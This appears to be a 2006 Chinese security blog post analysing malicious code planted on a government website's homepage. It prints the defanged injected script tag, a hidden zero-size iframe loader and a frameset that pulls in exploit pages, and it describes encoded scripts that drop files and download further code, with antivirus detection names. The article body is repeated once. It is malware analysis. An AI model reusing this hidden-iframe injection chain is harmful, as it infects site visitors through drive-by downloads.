某政府网站被加入的自动下载病毒文件的代码再创新花样(第1版)
2006-01-25 15:42
447 查看
endurer 原创
2006.01.23 第1版
今天浏览前几天说的那个被加入恶意代码的政府网站(详见: 某政府网站被加入的自动下载病毒文件的代码变了花样(第1版) ),又发现了新花样。
政府网站首页加入的代码为:
<script language="JavaScript" src="hxxp://www.***snqc.cn/images/mail.js"></script>
mail.js的内容为:
document.write("<iframe src=hxxp://www.***snqc.cn/images/error.htm width=0 height=0></iframe>");
error.htm的内容为:
<frameset rows="444,0" cols="*">
<frame src="hxxp://help.3721.com/error.html" framborder="no" scrolling="auto" noresize marginwidth="0" margingheight="0">
<frame src="top.htm" frameborder="no" scrolling="no" noresize marginwidth="0" margingheight="0">
<frame src="gif.htm" frameborder="no" scrolling="no" noresize marginwidth="0" margingheight="0">
<frame src="hxxp://help.3721.com/error.html" frameborder="no" scrolling="no" noresize marginwidth="0" margingheight="0">
</frameset>
top.htm 瑞星报为:Exploit.VBS.Phel.z,江民KV报为:Exploit.VBS.Phel.ab,Kaspersky报为:Exploit.VBS.Phel.be。
gif.htm 瑞星报为:Exploit.HTML.Mht,江民KV不报,Kaspersky报为:Exploit.HTML.Mht。
top.htm的内容是用escape()加密的脚本。此脚本会尝试生成文件c:/WINDOWS/Help/apps.chm,自动下载:hxxp://www.***snqc.cn/images/tzd.js。
tzd.js的内容也是用escape()加密的脚本,其中部分代码使用escape()加密了两次。此脚本会尝试生成文件C:/AUTOEXEC.COM,c:/NTDETECT.hta。
tzd.js:瑞星和江民KV报为Exploit.VBS.Phel,Kaspersky报为:Exploit.VBS.Phel.bq。
2006.01.23 第1版
今天浏览前几天说的那个被加入恶意代码的政府网站(详见: 某政府网站被加入的自动下载病毒文件的代码变了花样(第1版) ),又发现了新花样。
政府网站首页加入的代码为:
<script language="JavaScript" src="hxxp://www.***snqc.cn/images/mail.js"></script>
mail.js的内容为:
document.write("<iframe src=hxxp://www.***snqc.cn/images/error.htm width=0 height=0></iframe>");
error.htm的内容为:
<frameset rows="444,0" cols="*">
<frame src="hxxp://help.3721.com/error.html" framborder="no" scrolling="auto" noresize marginwidth="0" margingheight="0">
<frame src="top.htm" frameborder="no" scrolling="no" noresize marginwidth="0" margingheight="0">
<frame src="gif.htm" frameborder="no" scrolling="no" noresize marginwidth="0" margingheight="0">
<frame src="hxxp://help.3721.com/error.html" frameborder="no" scrolling="no" noresize marginwidth="0" margingheight="0">
</frameset>
top.htm 瑞星报为:Exploit.VBS.Phel.z,江民KV报为:Exploit.VBS.Phel.ab,Kaspersky报为:Exploit.VBS.Phel.be。
gif.htm 瑞星报为:Exploit.HTML.Mht,江民KV不报,Kaspersky报为:Exploit.HTML.Mht。
top.htm的内容是用escape()加密的脚本。此脚本会尝试生成文件c:/WINDOWS/Help/apps.chm,自动下载:hxxp://www.***snqc.cn/images/tzd.js。
tzd.js的内容也是用escape()加密的脚本,其中部分代码使用escape()加密了两次。此脚本会尝试生成文件C:/AUTOEXEC.COM,c:/NTDETECT.hta。
tzd.js:瑞星和江民KV报为Exploit.VBS.Phel,Kaspersky报为:Exploit.VBS.Phel.bq。
相关文章推荐
- 某政府网站被加入的自动下载病毒文件的代码变了花样(第3版)
- 某政府网站被加入自动下载病毒文件的代码(第3版)
- 又一个自动下载病毒的政府网站(第3版)
- 两个下载恶意程序文件的政府网站换花样了
- 一个被加入自动下载灰鸽子的代码的网站
- 两个会自动下载恶意程序文件的政府网站
- 简约大气的AnyCodeX在线编程网站全新升级啦!支持九种语言,多文件,标准输入,命令行参数,代码下载。还有语法高亮,语法纠错,代码块折叠以及全屏模式哦!
- Java实现文件自动打包成zip并下载的代码
- java自动下载https网站的证书并保存成文件(包括连接代理,代理认证)
- 代码管理 中 设计 asp.ne 网站 不要把 bin 和 obj 目录下生成文件加入到代码管理中
- 又一个下载恶意文件的政府网站
- 网站被黑,打开网页自动下载文件
- 一个被加入下载QQ盗号木马Trojan.PSW.QQPass.rie代码的网站
- 一个网站登录,然后下载网页源代码和文件的代码
- js自动下载文件到本地的实现代码
- 如何利用代码从网站上获取一个文件的大小,并且下载时不出现保存提示框
- Discuz! 5.0.0论坛程序中加入一段js代码,让会员点击下载附件前自动弹出提示窗口
- 【代码备忘】火狐浏览器插件xpi自动从网站下载安装的代码
- 一个网站登录,然后下载网页源代码和文件的代码
- Discuz! 5.0.0论坛程序中加入一段js代码,让会员点击下载附件前自动弹出提示窗口